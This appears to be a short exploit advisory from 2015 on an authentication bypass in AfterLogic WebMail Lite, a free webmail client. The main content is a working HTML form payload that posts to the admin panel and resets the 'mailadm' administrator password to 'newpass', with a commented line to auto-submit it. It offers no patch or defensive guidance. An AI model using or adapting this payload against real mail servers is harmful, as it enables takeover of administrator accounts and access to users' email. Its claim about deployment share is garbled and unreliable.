AfterLogic WebMail Lite Authentication Bypass
Posted on 28 March 2015
AfterLogic WebMail Lite is a free web-based IMAP and SMTP email-client with Ajax interface. AfterLogic WebMail Lite is available for both PHP and ASP.NET platforms. The version of AfterLogic WebMail Lite that is written in PHP is free and open-source software subject to the terms of the Affero General Public License (AGPL) version 3. The version written in ASP.NET is proprietary software available as freeware. And is deployed over 5/20 mailsevers, quite popular. This exploit attempts to exploit the admin and get(s) us a new password to the admin panel which should be located at site.com/mail/adminpanel/index.php <h2>After Logic Mail - Change Admin Password Exploit</h2> <form action="http://localhost/webmail/adminpanel/index.php?submit" method="POST" id="security_form"> <input type="hidden" name="form_id" value="security"> <input type="text" class="wm_input" name="txtUserName" id="txtUserName" value="mailadm" size="30" /> <input type="password" class="wm_input" name="txtNewPassword" id="txtNewPassword" value="newpass" size="30" /> <input type="password" class="wm_input" name="txtConfirmNewPassword" id="txtConfirmNewPassword" value="newpass" size="30" /> <input type="submit" name="submit_btn" value="Save" id="automate"> </form> <script> //uncomment the second line for automation //document.getElementById('automate').click(); </script>
